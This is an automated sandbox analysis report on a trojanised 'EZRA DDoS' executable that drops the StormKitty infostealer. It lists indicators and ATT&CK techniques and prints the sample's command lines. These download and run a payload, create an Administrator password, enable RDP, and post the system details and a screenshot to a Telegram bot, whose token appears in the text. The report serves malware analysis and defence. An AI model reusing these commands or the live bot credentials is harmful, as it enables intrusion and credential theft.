stormkitty | e9662b2692b709414df75045603153e417768e8d64f99639cc7d318cea261660

Resubmissions

26/02/2025, 08:33

250226-kf5y9asjv4 10

26/02/2025, 08:29

250226-kdkkja1qx7 10

Analysis

max time kernel
419s
max time network
428s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
26/02/2025, 08:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

EZRA DDoS V1.0.exe
Size

6.9MB
MD5

aa5f99414dbd298bae6a72139273e6eb
SHA1

76730e40cda2b49bbd37e0f677afb2fee2382474
SHA256

e9662b2692b709414df75045603153e417768e8d64f99639cc7d318cea261660
SHA512

dce415cc66a581740ec99f2b5f67b8ae999683d7957feba36de8caa916405833cc48a5ce673507bc55a9726e8784f3921014aa4126e734403a88ab8938ed8b4f
SSDEEP

3072:uHwrxmMpvDITZg1S5O5WtjN/02GM1qRJ7CetocaCqbqjywYlnVVkf:BrMZh7dOV/t1qujsVVE

Score

10^/10

stormkitty collection defense_evasion discovery execution persistence privilege_escalation spyware stealer

Malware Config

Signatures

StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0008000000023db8-114.dat	family_stormkitty
behavioral1/memory/4656-117-0x0000000000B10000-0x0000000000B66000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty

Blocklisted process makes network request 5 IoCs

flow	pid	Process
7	4564	powershell.exe
22	4812	wscript.exe
24	4812	wscript.exe
30	3020	powershell.exe
44	2572	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4520	powershell.exe
2572	powershell.exe
4564	powershell.exe
3020	powershell.exe
412	powershell.exe
4524	powershell.exe
1992	powershell.exe
3232	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001

Modifies Windows Firewall 2 TTPs 1 IoCs

defense_evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2288	netsh.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation	cscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation	wscript.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ctestx.vbs	wscript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ctestx.vbs	wscript.exe

Executes dropped EXE 1 IoCs

pid	Process
4656	reconstructed.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	reconstructed.exe
Key opened	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	reconstructed.exe
Key opened	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	reconstructed.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	EZRA DDoS V1.0.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops desktop.ini file(s) 4 IoCs

description	ioc	Process
File created	C:\ProgramData\QVLSXUFA\FileGrabber\Pictures\desktop.ini	reconstructed.exe
File created	C:\ProgramData\QVLSXUFA\FileGrabber\Desktop\desktop.ini	reconstructed.exe
File created	C:\ProgramData\QVLSXUFA\FileGrabber\Documents\desktop.ini	reconstructed.exe
File created	C:\ProgramData\QVLSXUFA\FileGrabber\Downloads\desktop.ini	reconstructed.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
22	raw.githubusercontent.com
44	raw.githubusercontent.com
6	raw.githubusercontent.com
7	raw.githubusercontent.com

Looks up external IP address via web service 7 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
68	api.ipify.org
69	ip-api.com
29	ipinfo.io
30	ipinfo.io
47	freegeoip.app
48	freegeoip.app
67	api.ipify.org

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reconstructed.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	reconstructed.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	reconstructed.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
3756	timeout.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 50 IoCs

pid	Process
4564	powershell.exe
4564	powershell.exe
3020	powershell.exe
3020	powershell.exe
3020	powershell.exe
4524	powershell.exe
4524	powershell.exe
4524	powershell.exe
1992	powershell.exe
1992	powershell.exe
1992	powershell.exe
3232	powershell.exe
3232	powershell.exe
3232	powershell.exe
2572	powershell.exe
2572	powershell.exe
2572	powershell.exe
412	powershell.exe
412	powershell.exe
412	powershell.exe
4520	powershell.exe
4520	powershell.exe
4520	powershell.exe
4656	reconstructed.exe
4656	reconstructed.exe
4656	reconstructed.exe
4656	reconstructed.exe
4656	reconstructed.exe
4656	reconstructed.exe
4656	reconstructed.exe
4656	reconstructed.exe
4656	reconstructed.exe
4656	reconstructed.exe
4656	reconstructed.exe
4656	reconstructed.exe
4656	reconstructed.exe
4656	reconstructed.exe
4656	reconstructed.exe
4656	reconstructed.exe
4656	reconstructed.exe
4656	reconstructed.exe
4656	reconstructed.exe
4656	reconstructed.exe
4656	reconstructed.exe
4656	reconstructed.exe
4656	reconstructed.exe
4656	reconstructed.exe
4656	reconstructed.exe
4656	reconstructed.exe
4656	reconstructed.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4564	powershell.exe
Token: SeIncreaseQuotaPrivilege	976	WMIC.exe
Token: SeSecurityPrivilege	976	WMIC.exe
Token: SeTakeOwnershipPrivilege	976	WMIC.exe
Token: SeLoadDriverPrivilege	976	WMIC.exe
Token: SeSystemProfilePrivilege	976	WMIC.exe
Token: SeSystemtimePrivilege	976	WMIC.exe
Token: SeProfSingleProcessPrivilege	976	WMIC.exe
Token: SeIncBasePriorityPrivilege	976	WMIC.exe
Token: SeCreatePagefilePrivilege	976	WMIC.exe
Token: SeBackupPrivilege	976	WMIC.exe
Token: SeRestorePrivilege	976	WMIC.exe
Token: SeShutdownPrivilege	976	WMIC.exe
Token: SeDebugPrivilege	976	WMIC.exe
Token: SeSystemEnvironmentPrivilege	976	WMIC.exe
Token: SeRemoteShutdownPrivilege	976	WMIC.exe
Token: SeUndockPrivilege	976	WMIC.exe
Token: SeManageVolumePrivilege	976	WMIC.exe
Token: 33	976	WMIC.exe
Token: 34	976	WMIC.exe
Token: 35	976	WMIC.exe
Token: 36	976	WMIC.exe
Token: SeIncreaseQuotaPrivilege	976	WMIC.exe
Token: SeSecurityPrivilege	976	WMIC.exe
Token: SeTakeOwnershipPrivilege	976	WMIC.exe
Token: SeLoadDriverPrivilege	976	WMIC.exe
Token: SeSystemProfilePrivilege	976	WMIC.exe
Token: SeSystemtimePrivilege	976	WMIC.exe
Token: SeProfSingleProcessPrivilege	976	WMIC.exe
Token: SeIncBasePriorityPrivilege	976	WMIC.exe
Token: SeCreatePagefilePrivilege	976	WMIC.exe
Token: SeBackupPrivilege	976	WMIC.exe
Token: SeRestorePrivilege	976	WMIC.exe
Token: SeShutdownPrivilege	976	WMIC.exe
Token: SeDebugPrivilege	976	WMIC.exe
Token: SeSystemEnvironmentPrivilege	976	WMIC.exe
Token: SeRemoteShutdownPrivilege	976	WMIC.exe
Token: SeUndockPrivilege	976	WMIC.exe
Token: SeManageVolumePrivilege	976	WMIC.exe
Token: 33	976	WMIC.exe
Token: 34	976	WMIC.exe
Token: 35	976	WMIC.exe
Token: 36	976	WMIC.exe
Token: SeDebugPrivilege	3020	powershell.exe
Token: SeDebugPrivilege	4524	powershell.exe
Token: SeIncreaseQuotaPrivilege	2816	WMIC.exe
Token: SeSecurityPrivilege	2816	WMIC.exe
Token: SeTakeOwnershipPrivilege	2816	WMIC.exe
Token: SeLoadDriverPrivilege	2816	WMIC.exe
Token: SeSystemProfilePrivilege	2816	WMIC.exe
Token: SeSystemtimePrivilege	2816	WMIC.exe
Token: SeProfSingleProcessPrivilege	2816	WMIC.exe
Token: SeIncBasePriorityPrivilege	2816	WMIC.exe
Token: SeCreatePagefilePrivilege	2816	WMIC.exe
Token: SeBackupPrivilege	2816	WMIC.exe
Token: SeRestorePrivilege	2816	WMIC.exe
Token: SeShutdownPrivilege	2816	WMIC.exe
Token: SeDebugPrivilege	2816	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2816	WMIC.exe
Token: SeRemoteShutdownPrivilege	2816	WMIC.exe
Token: SeUndockPrivilege	2816	WMIC.exe
Token: SeManageVolumePrivilege	2816	WMIC.exe
Token: 33	2816	WMIC.exe
Token: 34	2816	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2768 wrote to memory of 3160	2768	EZRA DDoS V1.0.exe	87
PID 2768 wrote to memory of 3160	2768	EZRA DDoS V1.0.exe	87
PID 3160 wrote to memory of 4564	3160	cmd.exe	89
PID 3160 wrote to memory of 4564	3160	cmd.exe	89
PID 3160 wrote to memory of 4896	3160	cmd.exe	93
PID 3160 wrote to memory of 4896	3160	cmd.exe	93
PID 4896 wrote to memory of 4812	4896	cscript.exe	94
PID 4896 wrote to memory of 4812	4896	cscript.exe	94
PID 3160 wrote to memory of 3756	3160	cmd.exe	95
PID 3160 wrote to memory of 3756	3160	cmd.exe	95
PID 3160 wrote to memory of 1672	3160	cmd.exe	100
PID 3160 wrote to memory of 1672	3160	cmd.exe	100
PID 1672 wrote to memory of 976	1672	cmd.exe	101
PID 1672 wrote to memory of 976	1672	cmd.exe	101
PID 4812 wrote to memory of 4912	4812	wscript.exe	103
PID 4812 wrote to memory of 4912	4812	wscript.exe	103
PID 4912 wrote to memory of 4268	4912	cmd.exe	105
PID 4912 wrote to memory of 4268	4912	cmd.exe	105
PID 4912 wrote to memory of 536	4912	cmd.exe	106
PID 4912 wrote to memory of 536	4912	cmd.exe	106
PID 536 wrote to memory of 4748	536	net.exe	107
PID 536 wrote to memory of 4748	536	net.exe	107
PID 4912 wrote to memory of 2328	4912	cmd.exe	108
PID 4912 wrote to memory of 2328	4912	cmd.exe	108
PID 4912 wrote to memory of 2288	4912	cmd.exe	109
PID 4912 wrote to memory of 2288	4912	cmd.exe	109
PID 4912 wrote to memory of 3312	4912	cmd.exe	110
PID 4912 wrote to memory of 3312	4912	cmd.exe	110
PID 3312 wrote to memory of 3020	3312	cmd.exe	111
PID 3312 wrote to memory of 3020	3312	cmd.exe	111
PID 4912 wrote to memory of 4020	4912	cmd.exe	113
PID 4912 wrote to memory of 4020	4912	cmd.exe	113
PID 4020 wrote to memory of 4524	4020	cmd.exe	114
PID 4020 wrote to memory of 4524	4020	cmd.exe	114
PID 4912 wrote to memory of 3920	4912	cmd.exe	115
PID 4912 wrote to memory of 3920	4912	cmd.exe	115
PID 3920 wrote to memory of 2816	3920	cmd.exe	116
PID 3920 wrote to memory of 2816	3920	cmd.exe	116
PID 4912 wrote to memory of 2180	4912	cmd.exe	117
PID 4912 wrote to memory of 2180	4912	cmd.exe	117
PID 2180 wrote to memory of 4180	2180	cmd.exe	118
PID 2180 wrote to memory of 4180	2180	cmd.exe	118
PID 4912 wrote to memory of 1924	4912	cmd.exe	119
PID 4912 wrote to memory of 1924	4912	cmd.exe	119
PID 1924 wrote to memory of 1464	1924	cmd.exe	120
PID 1924 wrote to memory of 1464	1924	cmd.exe	120
PID 4912 wrote to memory of 4556	4912	cmd.exe	121
PID 4912 wrote to memory of 4556	4912	cmd.exe	121
PID 4556 wrote to memory of 3368	4556	cmd.exe	122
PID 4556 wrote to memory of 3368	4556	cmd.exe	122
PID 4912 wrote to memory of 4564	4912	cmd.exe	123
PID 4912 wrote to memory of 4564	4912	cmd.exe	123
PID 4912 wrote to memory of 1992	4912	cmd.exe	124
PID 4912 wrote to memory of 1992	4912	cmd.exe	124
PID 4912 wrote to memory of 1756	4912	cmd.exe	126
PID 4912 wrote to memory of 1756	4912	cmd.exe	126
PID 4912 wrote to memory of 3232	4912	cmd.exe	128
PID 4912 wrote to memory of 3232	4912	cmd.exe	128
PID 4912 wrote to memory of 2572	4912	cmd.exe	129
PID 4912 wrote to memory of 2572	4912	cmd.exe	129
PID 4912 wrote to memory of 412	4912	cmd.exe	130
PID 4912 wrote to memory of 412	4912	cmd.exe	130
PID 4912 wrote to memory of 4520	4912	cmd.exe	131
PID 4912 wrote to memory of 4520	4912	cmd.exe	131

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	reconstructed.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	reconstructed.exe

C:\Users\Admin\AppData\Local\Temp\EZRA DDoS V1.0.exe
"C:\Users\Admin\AppData\Local\Temp\EZRA DDoS V1.0.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2768
- C:\Windows\SYSTEM32\cmd.exe
 cmd /c tls.bat
 2⤵
 - Suspicious use of WriteProcessMemory
 PID:3160
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 powershell -Command "Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/spooffewfe/yff/refs/heads/main/ctestx.txt' -OutFile 'C:\Users\Admin\AppData\Local\Temp\EZRA_TEMP\ctestx.txt'"
 3⤵
 - Blocklisted process makes network request
 - Command and Scripting Interpreter: PowerShell
 - Suspicious behavior: EnumeratesProcesses
 - Suspicious use of AdjustPrivilegeToken
 PID:4564
- - C:\Windows\system32\cscript.exe
 cscript //nologo "C:\Users\Admin\AppData\Local\Temp\EZRA_TEMP\ctestx.vbs"
 3⤵
 - Checks computer location settings
 - Suspicious use of WriteProcessMemory
 PID:4896
 - - C:\Windows\System32\wscript.exe
 "C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\EZRA_TEMP\ctestx.vbs" /elevated
 4⤵
 Blocklisted process makes network request
 Checks computer location settings
 Drops startup file
 Suspicious use of WriteProcessMemory
 PID:4812
 - - C:\Windows\system32\cmd.exe
 
 C:\Windows\system32\cmd.exe /c ""C:\decoded.bat" "
 5⤵
 Suspicious use of WriteProcessMemory
 
 PID:4912
 - C:\Windows\system32\cacls.exe
 
 "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
 6⤵
 
 PID:4268
 - C:\Windows\system32\net.exe
 
 net user Administrator P@ssw0rdXlazy#
 6⤵
 Suspicious use of WriteProcessMemory
 
 PID:536
 
 C:\Windows\system32\net1.exe
 
 C:\Windows\system32\net1 user Administrator P@ssw0rdXlazy#
 7⤵
 
 PID:4748
 - C:\Windows\system32\reg.exe
 
 reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
 6⤵
 
 PID:2328
 - C:\Windows\system32\netsh.exe
 
 netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes
 6⤵
 Modifies Windows Firewall
 Event Triggered Execution: Netsh Helper DLL
 
 PID:2288
 - C:\Windows\system32\cmd.exe
 
 C:\Windows\system32\cmd.exe /c powershell -command "Invoke-WebRequest -Uri 'https://ipinfo.io/json' -UseBasicParsing | ConvertFrom-Json | ForEach-Object { $_.ip + ',' + $_.country }"
 6⤵
 Suspicious use of WriteProcessMemory
 
 PID:3312
 
 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 
 powershell -command "Invoke-WebRequest -Uri 'https://ipinfo.io/json' -UseBasicParsing | ConvertFrom-Json | ForEach-Object { $_.ip + ',' + $_.country }"
 7⤵
 Blocklisted process makes network request
 Command and Scripting Interpreter: PowerShell
 Suspicious behavior: EnumeratesProcesses
 Suspicious use of AdjustPrivilegeToken
 
 PID:3020
 - C:\Windows\system32\cmd.exe
 
 C:\Windows\system32\cmd.exe /c powershell -command "(Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name 'PortNumber').PortNumber"
 6⤵
 Suspicious use of WriteProcessMemory
 
 PID:4020
 
 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 
 powershell -command "(Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name 'PortNumber').PortNumber"
 7⤵
 Command and Scripting Interpreter: PowerShell
 Suspicious behavior: EnumeratesProcesses
 Suspicious use of AdjustPrivilegeToken
 
 PID:4524
 - C:\Windows\system32\cmd.exe
 
 C:\Windows\system32\cmd.exe /c wmic os get Caption /value
 6⤵
 Suspicious use of WriteProcessMemory
 
 PID:3920
 
 C:\Windows\System32\Wbem\WMIC.exe
 
 wmic os get Caption /value
 7⤵
 Suspicious use of AdjustPrivilegeToken
 
 PID:2816
 - C:\Windows\system32\cmd.exe
 
 C:\Windows\system32\cmd.exe /c wmic cpu get Name /value
 6⤵
 Suspicious use of WriteProcessMemory
 
 PID:2180
 
 C:\Windows\System32\Wbem\WMIC.exe
 
 wmic cpu get Name /value
 7⤵
 
 PID:4180
 - C:\Windows\system32\cmd.exe
 
 C:\Windows\system32\cmd.exe /c wmic computersystem get NumberOfLogicalProcessors /value
 6⤵
 Suspicious use of WriteProcessMemory
 
 PID:1924
 
 C:\Windows\System32\Wbem\WMIC.exe
 
 wmic computersystem get NumberOfLogicalProcessors /value
 7⤵
 
 PID:1464
 - C:\Windows\system32\cmd.exe
 
 C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value
 6⤵
 Suspicious use of WriteProcessMemory
 
 PID:4556
 
 C:\Windows\System32\Wbem\WMIC.exe
 
 wmic os get TotalVisibleMemorySize /value
 7⤵
 
 PID:3368
 - C:\Windows\system32\curl.exe
 
 curl -s -X POST "https://api.telegram.org/bot7576409440:AAEhYc3BvwzU4FAC7xC6Sc9znSW9OBEtiNs/sendMessage" -d "chat_id=-1002449605159" -d "text=HIT Detected :) ====[HIT INFO]==== [+] System => Microsoft Windows 10 Pro [+] RAM => 3 GB [+] Processor => Intel Core Processor (Broadwell) [+] Cores => 2 [+] IP => 212.102.63.147 [+] Port => 3389 [+] Country => GB [+] User => Administrator [+] Password => P@ssw0rdXlazy# [+] Date => Wed 02/26/2025 8:38 %am_pm" -d "parse_mode=html"
 6⤵
 
 PID:4564
 - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 
 powershell -Command Add-Type -AssemblyName System.Windows.Forms; Add-Type -AssemblyName System.Drawing; $screen = [System.Windows.Forms.Screen]::PrimaryScreen.Bounds; $bitmap = New-Object System.Drawing.Bitmap($screen.Width, $screen.Height); $graphics = [System.Drawing.Graphics]::FromImage($bitmap); $graphics.CopyFromScreen($screen.Location, [System.Drawing.Point]::Empty, $screen.Size); $bitmap.Save('C:\Users\Admin\Desktop\screenshot.png', [System.Drawing.Imaging.ImageFormat]::Png); $graphics.Dispose(); $bitmap.Dispose()
 6⤵
 Command and Scripting Interpreter: PowerShell
 Suspicious behavior: EnumeratesProcesses
 
 PID:1992
 - C:\Windows\system32\curl.exe
 
 curl -s -X POST "https://api.telegram.org/bot7576409440:AAEhYc3BvwzU4FAC7xC6Sc9znSW9OBEtiNs/sendPhoto" -F "chat_id=-1002449605159" -F "photo=@C:\Users\Admin\Desktop\screenshot.png"
 6⤵
 
 PID:1756
 - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 
 powershell -Command "try { Add-MpPreference -ExclusionPath 'C:\Users\Admin\Documents'; Write-Host 'Access Granted' -ForegroundColor Green } catch { Write-Host 'Failed to Grant Access (Possibly, Try to disable your antivirus) ' -ForegroundColor Red; exit 1 }"
 6⤵
 Command and Scripting Interpreter: PowerShell
 Suspicious behavior: EnumeratesProcesses
 
 PID:3232
 - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 
 powershell -Command "Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/spooffewfe/yff/refs/heads/main/encrypt.txt' -UseBasicParsing -OutFile 'C:\Users\Admin\Documents\encrypt.txt'"
 6⤵
 Blocklisted process makes network request
 Command and Scripting Interpreter: PowerShell
 Suspicious behavior: EnumeratesProcesses
 
 PID:2572
 - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 
 powershell -Command "$encryptedDataBase64 = Get-Content 'C:\Users\Admin\Documents\encrypt.txt' -Raw; $encryptedData = [Convert]::FromBase64String($encryptedDataBase64); $decryptedData = $encryptedData | ForEach-Object { $_ -bxor 123 }; [System.IO.File]::WriteAllBytes('C:\Users\Admin\Documents\reconstructed.exe', $decryptedData)"
 6⤵
 Command and Scripting Interpreter: PowerShell
 Suspicious behavior: EnumeratesProcesses
 
 PID:412
 - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 
 powershell -Command "Start-Process -FilePath 'C:\Users\Admin\Documents\reconstructed.exe' -Verb RunAs -WindowStyle Hidden"
 6⤵
 Command and Scripting Interpreter: PowerShell
 Suspicious behavior: EnumeratesProcesses
 
 PID:4520
 
 C:\Users\Admin\Documents\reconstructed.exe
 
 "C:\Users\Admin\Documents\reconstructed.exe"
 7⤵
 Executes dropped EXE
 Accesses Microsoft Outlook profiles
 Drops desktop.ini file(s)
 System Location Discovery: System Language Discovery
 Checks processor information in registry
 Suspicious behavior: EnumeratesProcesses
 outlook_office_path
 outlook_win_path
 
 PID:4656
- - C:\Windows\system32\timeout.exe
 timeout /t 2
 3⤵
 - Delays execution with timeout.exe
 PID:3756
- - C:\Windows\system32\cmd.exe
 C:\Windows\system32\cmd.exe /c wmic csproduct get UUID /value
 3⤵
 - Suspicious use of WriteProcessMemory
 PID:1672
 - - C:\Windows\System32\Wbem\WMIC.exe
 wmic csproduct get UUID /value
 4⤵
 Suspicious use of AdjustPrivilegeToken
 PID:976

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\QVLSXUFA\Browsers\Firefox\Bookmarks.txt

Filesize
105B

MD5
2e9d094dda5cdc3ce6519f75943a4ff4

SHA1
5d989b4ac8b699781681fe75ed9ef98191a5096c

SHA256
c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142

SHA512
d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

Download Submit
C:\ProgramData\QVLSXUFA\FileGrabber\Desktop\ConnectEnter.docx

Filesize
485KB

MD5
be2d20cf97bd27570578fa3a0b636fe7

SHA1
682494a08cf8052162706b081b6e8145b5917795

SHA256
3601dd76db8a0f4bbff09d6fe8ff13c72b06a3f0c18a12dd4ff8ef14aa7c0766

SHA512
ba5a152293273c98c7faa0b16a5325c118e3fc9548ef0164663a2021dff176c5b68c8f6a3dc3c8d1b6fd68adc05242936b9812c7f9d2ebb08dec5bfef767f0b4

Download Submit
C:\ProgramData\QVLSXUFA\FileGrabber\Desktop\InitializeSend.sql

Filesize
588KB

MD5
fac64ed8b43f452da9355c44a386f980

SHA1
406eaa9be7cfb0f37c702e4bfc1f2cc4fe174515

SHA256
f45afd280a6f4becdca15b04068339ce2a2f0aed84805b422f6a0ac867086faa

SHA512
3c5c1780ed88d43c5fdf5a7ec343da4306de2a9800b5f016a3841064af15c9faa98dc96cbea70bc7df261de438b48fefa365554ca74b2a69a835dc4bf4892d04

Download Submit
C:\ProgramData\QVLSXUFA\FileGrabber\Desktop\ProtectExit.txt

Filesize
639KB

MD5
70227e23faec5617ed5c33e4f2005c2e

SHA1
557008dc68ba3b8a6ac7c4c5e961c1f9056edf7f

SHA256
110a7e785d975130287666fb8d4da59ec37b9fa93d98e96c57d47c98aaec06c3

SHA512
f05bf3da4488f7b6d784a06e59594d80e49c0458d519e579dcd5a3295b03ea07e3461264b7ca85f15aef4e5808bafd8a244054cfd4ff2d0d7c6f1b1529cc135a

Download Submit
C:\ProgramData\QVLSXUFA\FileGrabber\Documents\RenameProtect.txt

Filesize
1.3MB

MD5
6b05f66c5b4cd672cb09b4bf84a88d72

SHA1
fb4c0c02f9bcafc3ea840f9f4ac79d86012b8904

SHA256
141d18deba0ac7722cfb5caf44716fac59710f446aed1a63380e0d8ee236c2f5

SHA512
fbffad3f185c4abfcabf3ddbacb5fa2ebe933fc5449107a0ed0329ef889e748dce5e37a3bdec5ecab252cd9394907457d3c94982bed8e67ebc123dc299718245

Download Submit
C:\ProgramData\QVLSXUFA\FileGrabber\Downloads\ConvertWrite.png

Filesize
495KB

MD5
20ea1be971bfd7474ddf5629602d9d87

SHA1
a6fded1777ba64748bc6f355009b4c6191c7672b

SHA256
9b7ffd9c5ad315a8aac6c721ba5bc0654eccf1d1876914e149d37660948ca8d2

SHA512
454982a1bfd8ec57cbbec5a238a8bbdbd5454c7d8aa82b71483acdda3cf667a6db35f369c46a89024a1e7a9af9148c75e3d030b6e234beaad3d3b83c344886f4

Download Submit
C:\ProgramData\QVLSXUFA\FileGrabber\Downloads\DisableComplete.xlsx

Filesize
672KB

MD5
47412ed8c39dcd40b1738cb82e26e51b

SHA1
e9a1815f4359c182c0b59b18798007ec17703fc8

SHA256
56cfdf2ac628d124b7cb3c1778591c9992011041032a9465dca212f08bc3f097

SHA512
0435abfc509a5ee1775e2f1c037b663dbbc2a05dc1e86edca56e546de71c3202090bb36b1fc22cdbd3a9011e5cdfa592c9309e8e631f50b19fd464f8537c806f

Download Submit
C:\ProgramData\QVLSXUFA\FileGrabber\Downloads\ResumeShow.txt

Filesize
1.2MB

MD5
6225fae905f817654eb33df9fddb0edb

SHA1
e6c8b09d1fb4361172b3604fc27230372bc63860

SHA256
